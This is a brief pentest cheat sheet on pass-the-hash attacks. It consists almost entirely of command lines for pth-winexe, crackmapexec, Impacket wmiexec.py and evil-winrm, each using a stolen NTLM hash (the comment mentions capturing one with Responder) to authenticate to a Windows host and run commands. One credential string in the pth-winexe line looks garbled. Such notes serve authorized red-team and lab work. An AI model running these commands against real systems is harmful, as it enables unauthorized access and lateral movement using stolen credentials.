Pass-the-hash
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
#If you manage to steal an NTLM hash with responder, authenticate with pth-winexe
#Basic usage
pth-winexe -U redcliff123iuhnd7s8fh240-gfkmjhsaf //10.10.10.10 cmd
#crackmapexec
crackmapexec smb 10.10.10.10 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local
#Impacket
wmiexec.py domain.local/user@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
#Evil-winrm
evil-winrm -i 10.10.10.10 -u user -H BD1C6503987F8FF006296118F359FA79
Last updated